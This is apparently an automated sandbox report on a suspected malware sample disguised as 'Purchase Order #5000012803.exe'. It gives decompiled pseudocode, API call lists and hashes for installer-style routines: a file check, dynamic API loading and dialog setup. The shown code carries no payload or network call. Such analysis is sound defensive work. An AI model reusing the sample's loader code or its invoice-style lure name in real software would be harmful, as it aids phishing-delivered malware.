                      0x004063f7
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406199
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406107
                      0x00000000
                      0x00406107
                      0x00406193
                      0x0040609c
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x00000000
                      0x004066b5
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00000000
                      0x00406828
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x00000000
                      0x0040667d
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                      • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                      • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                      • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 614 405d7c-405d90 FindFirstFileA 615 405d92-405d9b FindClose 614->615 616 405d9d 614->616 617 405d9f-405da0 615->617 616->617
                      C-Code - Quality: 100%
                      			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}




                      0x00405d87
                      0x00405d90
                      0x00000000
                      0x00405d9d
                      0x00405d93
                      0x00000000

                      APIs
                      • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 00405D87
                      • FindClose.KERNEL32(00000000), ref: 00405D93
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID: $B
                      • API String ID: 2295610775-2366330246
                      • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                      • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                      • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                      • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                      0x00405dab
                      0x00405dae
                      0x00405db5
                      0x00405dbd
                      0x00405dca
                      0x00000000
                      0x00405dd1
                      0x00405dc0
                      0x00405dc8
                      0x00000000
                      0x00000000
                      0x00405dd9

                      APIs
                      • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: AddressHandleLibraryLoadModuleProc
                      • String ID:
                      • API String ID: 310444273-0
                      • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                      • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                      • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                      • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004035E3, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213stringregistrylibraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 119 403659-403678 call 403897 call 405659 111->119 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->119 126 40367e-403683 119->126 127 4036ff-403707 call 405659 119->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 140 4036be-4036ca lstrlenA 135->140 141 4036af-4036bc call 4055a3 135->141 142 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->142 143 40388d 137->143 150 4037d3-4037d6 138->150 151 4037db-4037e6 call 403897 138->151 147 4036f2-4036fa call 405578 call 405a85 140->147 148 4036cc-4036da lstrcmpiA 140->148 141->140 142->138 145 40388f-403896 143->145 147->127 148->147 149 4036dc-4036e6 GetFileAttributesA 148->149 154 4036e8-4036ea 149->154 155 4036ec-4036ed call 4055bf 149->155 150->145 161 403864-40386c call 404ef5 151->161 162 4037e8-403805 ShowWindow LoadLibraryA 151->162 154->147 154->155 155->147 169 403886-403888 call 40140b 161->169 170 40386e-403874 161->170 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 167 403822-403832 GetClassInfoA RegisterClassA 164->167 168 403838-403862 DialogBoxParamA call 40140b 164->168 167->168 168->145 169->143 170->150 172 40387a-403881 call 40140b 170->172 172->150
                      C-Code - Quality: 96%
                      			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0;
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x69
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                      0x004035e9
                      0x004035f2
                      0x004035f9
                      0x004035fb
                      0x0040360f
                      0x00403621
                      0x0040362b
                      0x00403630
                      0x00403636
                      0x00403649
                      0x00403649
                      0x00403654
                      0x004035fd
                      0x00403608
                      0x00403608
                      0x00403659
                      0x00403663
                      0x0040366c
                      0x00403678
                      0x004036ff
                      0x00403707
                      0x00403710
                      0x00403710
                      0x00403726
                      0x0040372c
                      0x0040373a
                      0x004037c9
                      0x004037d1
                      0x004037db
                      0x004037e0
                      0x004037e6
                      0x00403865
                      0x0040386a
                      0x0040386c
                      0x00403888
                      0x00000000
                      0x00403888
                      0x0040386e
                      0x00403874
                      0x0040387c
                      0x0040387c
                      0x00000000
                      0x00403874
                      0x004037f0
                      0x00403801
                      0x00403803
                      0x00403805
                      0x0040380c
                      0x0040380c
                      0x00403814
                      0x0040381c
                      0x0040381e
                      0x00403820
                      0x00403829
                      0x0040382c
                      0x00403832
                      0x00403832
                      0x00403851
                      0x0040385b
                      0x00000000
                      0x00403860
                      0x004037d3
                      0x004037d5
                      0x00000000
                      0x00403740
                      0x00403740
                      0x00403746
                      0x00403750
                      0x00403758
                      0x00403762
                      0x00403768
                      0x00403776
                      0x0040388d
                      0x0040388d
                      0x00000000
                      0x0040388d
                      0x0040377c
                      0x00403785
                      0x004037c4
                      0x00000000
                      0x004037c4
                      0x0040367e
                      0x0040367e
                      0x00403683
                      0x00000000
                      0x00000000
                      0x0040368d
                      0x0040369d
                      0x004036a2
                      0x004036a9
                      0x00000000
                      0x00000000
                      0x004036ad
                      0x004036af
                      0x004036bc
                      0x004036bc
                      0x004036c4
                      0x004036ca
                      0x004036f2
                      0x004036fa
                      0x00000000
                      0x004036dc
                      0x004036dd
                      0x004036e6
                      0x004036ec
                      0x004036ed
                      0x00000000
                      0x004036ed
                      0x004036e8
                      0x004036ea
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004036ea
                      0x004036ca

                      APIs
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                      • lstrlenA.KERNEL32(icluciob,?,?,?,icluciob,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ), ref: 004036BF
                      • lstrcmpiA.KERNEL32(?,.exe,icluciob,?,?,?,icluciob,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                      • GetFileAttributesA.KERNEL32(icluciob), ref: 004036DD
                      • LoadImageA.USER32 ref: 00403726
                        • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                      • RegisterClassA.USER32 ref: 0040376D
                      • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                      • CreateWindowExA.USER32 ref: 004037BE
                      • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                      • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                      • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                      • GetClassInfoA.USER32 ref: 0040381C
                      • GetClassInfoA.USER32 ref: 00403829
                      • RegisterClassA.USER32 ref: 00403832
                      • DialogBoxParamA.USER32 ref: 00403851
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$icluciob
                      • API String ID: 914957316-1106978021
                      • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                      • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                      • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                      • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
